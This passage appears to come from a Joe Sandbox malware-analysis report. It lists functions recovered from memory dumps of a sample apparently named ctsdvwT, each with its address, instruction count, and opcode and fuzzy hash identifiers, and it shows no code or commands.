                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5db201d7a3bc43f9210bd4fde095573db02bdbd1c0ea312286ff059d260b6daf
                                        • Instruction ID: 00a7953f4b04cd0b63f4cdf75e8cb9776ac3cd0b2c358e961bc39def40e2551d
                                        • Opcode Fuzzy Hash: 5db201d7a3bc43f9210bd4fde095573db02bdbd1c0ea312286ff059d260b6daf
                                        • Instruction Fuzzy Hash: BAB18C746007018FC309EF28D994A9ABBF6FF89300B54886ED45A8B365DF34AD45CB91
                                        Function 07F72DB4 Relevance: .3, Instructions: 262COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6783c05b9b6c03b0bea8dc14980d05dcdb7350ae99989de2818ca41cf678f3f4
                                        • Instruction ID: d3d32a70ec0a1bde1cbb64db86d3a0a651e8d9ef4369b3ee65fb7321a76c6ed9
                                        • Opcode Fuzzy Hash: 6783c05b9b6c03b0bea8dc14980d05dcdb7350ae99989de2818ca41cf678f3f4
                                        • Instruction Fuzzy Hash: 05B18A74610701CFC305EF28D894A9ABBF6FF89300B5488AED45A8B375EB34E945CB91
                                        Function 07F72B68 Relevance: .3, Instructions: 261COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b289282dcedca8528bc87f501b0d4699ccc358d710734d89a104da40486fdfb
                                        • Instruction ID: 3e35cdf99e4c38fcfdf52b546ac01b652bbe9f6306b9da42d71c033faff30f99
                                        • Opcode Fuzzy Hash: 3b289282dcedca8528bc87f501b0d4699ccc358d710734d89a104da40486fdfb
                                        • Instruction Fuzzy Hash: D7A18B74610701CFC305EF38D594A9ABBF6FF89300F5489AED45A8B365EB30A946CB91
                                        Function 07F72C57 Relevance: .3, Instructions: 260COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72c2e37192dbf08fd09dbe3f3ae618ef1285244032e0c2a7add04b5a8d82d3e4
                                        • Instruction ID: 52fb1c298fa38f59b1b2a41bb6c809b9a9027fa09b0303973c62ffa170a27cda
                                        • Opcode Fuzzy Hash: 72c2e37192dbf08fd09dbe3f3ae618ef1285244032e0c2a7add04b5a8d82d3e4
                                        • Instruction Fuzzy Hash: 94B17C746007018FC305EF38D494A9ABBF6FF89300F54896ED45A8B365EF34A946CB91
                                        Function 07F72BCD Relevance: .3, Instructions: 260COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c16304964935af2c3304e57a82441b40ef00f0a58f0f062611f91621798f2eb2
                                        • Instruction ID: da0a5406565c2cb0341c9ed08cd5257440477de4a0c588cf4863480b92f9d0fc
                                        • Opcode Fuzzy Hash: c16304964935af2c3304e57a82441b40ef00f0a58f0f062611f91621798f2eb2
                                        • Instruction Fuzzy Hash: 67A17B746107018FC305EF38D894A9ABBF6FF89300F5488AED45A8B375EB34A945CB91
                                        Function 07F72ADB Relevance: .3, Instructions: 260COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 973b895bec2731eae616ee080a861be4c17fc3e51b24a92b01df5bc8e7931a72
                                        • Instruction ID: 0068b202c1af503ca03ecef75188ed121e8a2299ae7d1d0ec1dcdda9d76d3d37
                                        • Opcode Fuzzy Hash: 973b895bec2731eae616ee080a861be4c17fc3e51b24a92b01df5bc8e7931a72
                                        • Instruction Fuzzy Hash: 7BA16A756007018FC305EF28D594A9ABBF6FF89300F5488AED45A8B375DB30A946CB91
                                        Function 07F72A7A Relevance: .3, Instructions: 260COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5181035a6d907fc183d375ea4b5c632f6e55d7fba1fc95e02dc91692ece4ebca
                                        • Instruction ID: ec4cec9a8b08cc3b7e57cc1b5c10b97fe6d6189569473df126d77299f6ed503b
                                        • Opcode Fuzzy Hash: 5181035a6d907fc183d375ea4b5c632f6e55d7fba1fc95e02dc91692ece4ebca
                                        • Instruction Fuzzy Hash: 25B16A756107018FC305EF38D494A9ABBF6FF89300F5488AED45A8B375EB34A946CB91
                                        Function 07F72950 Relevance: .3, Instructions: 260COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 27ced0bf019f3b2a88203476cbb1ab7afaae7f8fae218cc5d85d1166621943d8
                                        • Instruction ID: f7e14dc4914ebd9e36828bd4c8f8cf92d7a7499c5b99204e3539811cb7e6fc50
                                        • Opcode Fuzzy Hash: 27ced0bf019f3b2a88203476cbb1ab7afaae7f8fae218cc5d85d1166621943d8
                                        • Instruction Fuzzy Hash: 08A16B756007018FC345EF38D894A9ABBF6FF89300B5488AED45A8B375DB30A945CB91
                                        Function 07F72D8C Relevance: .3, Instructions: 258COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 55ccd9c2439f675f729ba259a2123a161137af4b6db6e54fd28b3db9334b8d29
                                        • Instruction ID: 94f8fb2bf3980029448daf2b2ecd6550fddfa2c2ac67b411d6383d6cf286cf2e
                                        • Opcode Fuzzy Hash: 55ccd9c2439f675f729ba259a2123a161137af4b6db6e54fd28b3db9334b8d29
                                        • Instruction Fuzzy Hash: CCA17C742107018FC309EF38D594A9ABBF6FF89300F54896ED45A8B365EF34A946CB91
                                        Function 07F72CAC Relevance: .3, Instructions: 256COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dcc8e1b9ec578b160622faf8fa5e9a1170c3f0714d51defb117d17246d5b899c
                                        • Instruction ID: 17a2a42903d3c25d2768b7a9fc5960e8f09ba46a3bcf27c32e242c0790da519d
                                        • Opcode Fuzzy Hash: dcc8e1b9ec578b160622faf8fa5e9a1170c3f0714d51defb117d17246d5b899c
                                        • Instruction Fuzzy Hash: 8BA18C746107018FC309EF38D494A9ABBF6FF89300F54886ED45A8B365EF30A946CB91
                                        Function 07F72920 Relevance: .3, Instructions: 255COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a513a90c43b98ecfadb63dabf35c77d12881018c42255ec1b60320be624a2f3f
                                        • Instruction ID: c03f5c364c3e94987e211f934dffecf4fa4e7f5d0adc76db53f85466f9c0fcda
                                        • Opcode Fuzzy Hash: a513a90c43b98ecfadb63dabf35c77d12881018c42255ec1b60320be624a2f3f
                                        • Instruction Fuzzy Hash: 16A16B746107018FC305EF38D494A9ABBF6FF89300F5489AED45A8B365EF34A946CB91
                                        Function 07F72E57 Relevance: .2, Instructions: 225COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab07627917d54ea88acee607d93cf15cfb61558129a762b8e6dde3976be13303
                                        • Instruction ID: cb56b8628d5d358b551057f7df2e1fbfed9c3c307c414a1f7213e8121a777dfb
                                        • Opcode Fuzzy Hash: ab07627917d54ea88acee607d93cf15cfb61558129a762b8e6dde3976be13303
                                        • Instruction Fuzzy Hash: B19139742107018FC349EF38D594A9ABBF6FF89300B54886ED45A8B375EF34A946CB91
                                        Function 07F72EB0 Relevance: .2, Instructions: 196COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4936bf6e4a4428b0f3a26d16eb033aafba663c97977a6ea566af85c770c7d770
                                        • Instruction ID: 654c97aa6fd1287239919e6c2c1365bc5e82e87a42de019ee8045306f47493a0
                                        • Opcode Fuzzy Hash: 4936bf6e4a4428b0f3a26d16eb033aafba663c97977a6ea566af85c770c7d770
                                        • Instruction Fuzzy Hash: 20812874610B008FC749EF38D494AAABBE6FF89300B50896DD05A8B374EF35AD45CB91
                                        Function 07F7ACAF Relevance: .2, Instructions: 157COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 894a10d09bb4d4aba21492c8bd1783c7062216a1a7256a56367d35e82edb3321
                                        • Instruction ID: e7a3f36b2c01ba88a6de3a20c61b233e8054bbce221cf60f7fe9fdbf8d10c44f
                                        • Opcode Fuzzy Hash: 894a10d09bb4d4aba21492c8bd1783c7062216a1a7256a56367d35e82edb3321
                                        • Instruction Fuzzy Hash: 935146B0D06255CFD711CF68C684A8EBBB2FF4A316F59D1A6D0089B212C330E985CF91
                                        Function 07F74C87 Relevance: .1, Instructions: 138COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 03a127f1477bc3636775685eda0d9cbafd5995c6a42410ff749f30fffcc58c94
                                        • Instruction ID: 1dc13ac5fe3aa699b5f4044b8965b65e04bd32ac77c3c0a9510d4a27edca2fd2
                                        • Opcode Fuzzy Hash: 03a127f1477bc3636775685eda0d9cbafd5995c6a42410ff749f30fffcc58c94
                                        • Instruction Fuzzy Hash: 0B51C1B4919684DFC306CB69E554958BFF0EF8A300B2A80D6D484DB2B3CB35AD15C712
                                        Function 07F7BE80 Relevance: .1, Instructions: 133COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 310c76e2cec7aded93f404a5444f822725f2b508d87c6b5eb0006565078cab58
                                        • Instruction ID: 7aae35b514f20ced36bf603eb13d93e451895031b36af23629501c1e6d7d8e1f
                                        • Opcode Fuzzy Hash: 310c76e2cec7aded93f404a5444f822725f2b508d87c6b5eb0006565078cab58
                                        • Instruction Fuzzy Hash: BA41D6F5E18109CBCB04CF99D484AEDBBB9FB9A320F189566E919A7311D7309981CF90
                                        Function 07F7BB40 Relevance: .1, Instructions: 129COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb4760ed3b60d2725d279aa7027524c93c6501e52e079121e0b4330481589c80
                                        • Instruction ID: 88ead606ea381cd4b7e210ce75a6663582c15f20b2c1b13126be98147a4cf2e8
                                        • Opcode Fuzzy Hash: eb4760ed3b60d2725d279aa7027524c93c6501e52e079121e0b4330481589c80
                                        • Instruction Fuzzy Hash: 56413CF5E182098BDB08CF9ED4446EEBBF6AF8A301F18D02AE419A3255CB349941CF54
                                        Function 07F74E3A Relevance: .1, Instructions: 123COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d89fecb5c1e421c1fe425f330a408bdd168e2208143a01c6c7f5c0cb3d9736fe
                                        • Instruction ID: 5c130992c87fd68703f647700bbb65e63b4e46775555b8546ce221c68df200e0
                                        • Opcode Fuzzy Hash: d89fecb5c1e421c1fe425f330a408bdd168e2208143a01c6c7f5c0cb3d9736fe
                                        • Instruction Fuzzy Hash: 1341B2B5D29259DFCB00CFA8E4849FEBBB4FB4E310F459856E466A7311DB30A810CB65
                                        Function 07F74E48 Relevance: .1, Instructions: 117COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4fdaf7d6a11836edf71e6e891ccccd42bb446b1ecd819159a64218fe059d43e3
                                        • Instruction ID: ffeac15caaa8cd7f570a179fd018bf6f1e5aa67023f5fc3d8cb51f6421ccf78f
                                        • Opcode Fuzzy Hash: 4fdaf7d6a11836edf71e6e891ccccd42bb446b1ecd819159a64218fe059d43e3
                                        • Instruction Fuzzy Hash: E341C4B5D29259DFCB00CFA8E4848FEBBB4FB4E310F455856E466A7311D730A810CB65
                                        Function 07F7570B Relevance: .1, Instructions: 108COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c7727c4de01dd59ce0a514c54f03caa5be2ce1731bd84dbb68a3e924e6c92d7
                                        • Instruction ID: 325c15cc9f0d3c6f8576a4e100ce63fe339ae2a5651e10358d10fe0c90a3d304
                                        • Opcode Fuzzy Hash: 2c7727c4de01dd59ce0a514c54f03caa5be2ce1731bd84dbb68a3e924e6c92d7
                                        • Instruction Fuzzy Hash: 2E419CB5E1422DDFCB05CFA9C984AEDBBB2BB0A300F549026E816FB211DB349951CF14
                                        Function 07F74FC6 Relevance: .1, Instructions: 104COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 77934b5bc4e7e65a7cf963b4145f24996bc81b284c7fd58f16f339694c214bef
                                        • Instruction ID: 690407ba0298bc518bda5df1354390a4d8a096bb62bb4600dbbfc798e4f8844e
                                        • Opcode Fuzzy Hash: 77934b5bc4e7e65a7cf963b4145f24996bc81b284c7fd58f16f339694c214bef
                                        • Instruction Fuzzy Hash: AC41E3B5E29259DFCB00CFA8E4849FDBBB4FB4E311F055856E426B7251DB31A920CB24
                                        Function 07F7729C Relevance: .1, Instructions: 103COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 05d3e856c4af1fc9875ba1882137111db629dcc994946f7f4f264fa95d624a95
                                        • Instruction ID: 23e1bc226339232a8ec906f8edc392a3eb20690e3faa9ca0b6a9882c2284674c
                                        • Opcode Fuzzy Hash: 05d3e856c4af1fc9875ba1882137111db629dcc994946f7f4f264fa95d624a95
                                        • Instruction Fuzzy Hash: 3F313CA07042A58BCB197B7D486813F2D97EFD5350B58086EDA06DB3C4DE28CD02C3A6
                                        Function 07F73518 Relevance: .1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c57a7b2362c4863e4585019302c3df62e20a4124525ffd5992c50e73a812ea81
                                        • Instruction ID: 2a620063d3683e89b37906617628048b317ad6d05b2facea5d22205ca910e87a
                                        • Opcode Fuzzy Hash: c57a7b2362c4863e4585019302c3df62e20a4124525ffd5992c50e73a812ea81
                                        • Instruction Fuzzy Hash: C9318B75A002499FCB05DFA4C984EEE7BF6EF49300F1980AAE905AB361DB35ED05CB50
                                        Function 07F772D4 Relevance: .1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 45f30bbd3bb29cbd7ec02f7d3ab3eeccac79dbf0ad5e2a59dddf10c943a14da4
                                        • Instruction ID: ac1340b2d85d6220171fd1c957163f4b1c51bda528ded58f082a46b0a9a0328e
                                        • Opcode Fuzzy Hash: 45f30bbd3bb29cbd7ec02f7d3ab3eeccac79dbf0ad5e2a59dddf10c943a14da4
                                        • Instruction Fuzzy Hash: 683159B1900208AFCF10DFA9D848A9EBFF9EF48350F14842AE518E7310D775A944CFA4
                                        Function 0142D1FC Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2247711239.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_142d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e3f1e0c3c9bb9b178a8314961e44555ed812ba80950b69d1b9672f97137aff8c
                                        • Instruction ID: feda01435f908693ec20dd4d70d407de4579ea8d0a3d1037a39c3cec1707e1e2
                                        • Opcode Fuzzy Hash: e3f1e0c3c9bb9b178a8314961e44555ed812ba80950b69d1b9672f97137aff8c
                                        • Instruction Fuzzy Hash: 7D21F171904240DFDB06DF98D9C4B27BF65FB89320F60C56AE9094B266C33AD496CBB1
                                        Function 0142D4C4 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2247711239.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_142d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 712ca07022659380e7bc7567b5a9e4dea201aa3d907e0df721fb00a01f21ec9e
                                        • Instruction ID: 0e408ed49eaac17335143db81da5976e1c58f0d967099d85ed8e334f002bd896
                                        • Opcode Fuzzy Hash: 712ca07022659380e7bc7567b5a9e4dea201aa3d907e0df721fb00a01f21ec9e
                                        • Instruction Fuzzy Hash: 1E21F171904240DFDB05DF58D980B27BF65FB88318F60C56AE9090B266C37AD496CAA2
                                        Function 0143D1D4 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2247772308.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_143d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c537fb56a0ea3a6089f1ce18772ed68c33513cbdcf1ea5307b74a1aef2031807
                                        • Instruction ID: 34f60c681a80de63a2b98ace24c44a72ed9dfe6d2c5a9cf50da2d154cdc0cd24
                                        • Opcode Fuzzy Hash: c537fb56a0ea3a6089f1ce18772ed68c33513cbdcf1ea5307b74a1aef2031807
                                        • Instruction Fuzzy Hash: 09210771904204DFDB05DFA8D9C0F26BB65FBC8324F60C56EE9494B366C73AD406CA61
                                        Function 0143D01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2247772308.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_143d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf69446f00df7deef454a0866d6b468419423e7d80fd514e651db39db2af826d
                                        • Instruction ID: 33a59aad41b4be4f5a53942b689cb4bb007e935fbd649b873f3722d4de3ef9cc
                                        • Opcode Fuzzy Hash: bf69446f00df7deef454a0866d6b468419423e7d80fd514e651db39db2af826d
                                        • Instruction Fuzzy Hash: 3B2103B1904200DFDB15DF68D980B16FF75FB88718F60C56AD94A0B366C33AD407CA61
                                        Function 07F73170 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5cb74973bb442dc9f243fe4b55c19c89821a0ed3a9cb5109d29008a599cf55c2
                                        • Instruction ID: 51673614d615df7a3df8e71e07743428a879f102948f0e373cfa4de4a767498f
                                        • Opcode Fuzzy Hash: 5cb74973bb442dc9f243fe4b55c19c89821a0ed3a9cb5109d29008a599cf55c2
                                        • Instruction Fuzzy Hash: 2C216AB5A007118FC310DF68C980ABBBBF9FF88700B14896DE819DB720E7749945CBA0
                                        Function 07F7726C Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8fdfe302c81f417bbf315610c8edc19d8673856948a5972b256f967b0caa0e45
                                        • Instruction ID: c6188bcbbf167efbf7f4e13072036f6451ce6ae0543d94eabc81a5bfca5ee2e3
                                        • Opcode Fuzzy Hash: 8fdfe302c81f417bbf315610c8edc19d8673856948a5972b256f967b0caa0e45
                                        • Instruction Fuzzy Hash: D211B2B1A093449FCB05DB74CD5A66E7FE4DF42210F2889EAA815C7391E934DD05C762
                                        Function 07F76FEA Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4649fb610cf97c28511ffb40d2fe500a8933fbd9e7ef149c9d15c4d0a075a2d1
                                        • Instruction ID: a934b3fb1cfb718fe72b28a9dd6bcc67691401ebeea7a753fa1eeba62c029a20
                                        • Opcode Fuzzy Hash: 4649fb610cf97c28511ffb40d2fe500a8933fbd9e7ef149c9d15c4d0a075a2d1
                                        • Instruction Fuzzy Hash: 002196B1A00619DFD714DF6AC444BABBBF5FB89364F28C16AE428D7250DB348945CBA0
                                        Function 07F73CA4 Relevance: .1, Instructions: 67COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fb70aa61022bee79813cd818cf5457e7701b16842f5e0836a9fffac95758da37
                                        • Instruction ID: 5703873bf08f0bf7d60ed5577245a653c3f78c08a93f812761426ff992ca3dd4
                                        • Opcode Fuzzy Hash: fb70aa61022bee79813cd818cf5457e7701b16842f5e0836a9fffac95758da37
                                        • Instruction Fuzzy Hash: 3F31CEB0C01719DFDB20DF9AC588B9EBFF5EB09714F24845AE408AB250C7B99845CBA5
                                        Function 07F76B8E Relevance: .1, Instructions: 67COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5fbec5a4c633e2415dde577bbd4c3dfbcdaa1591989340b8c6868f38c9a4ff11
                                        • Instruction ID: 3a1d359918f0635c005406956f4df98163049cb7af0b9367fdd8372ae9759b6f
                                        • Opcode Fuzzy Hash: 5fbec5a4c633e2415dde577bbd4c3dfbcdaa1591989340b8c6868f38c9a4ff11
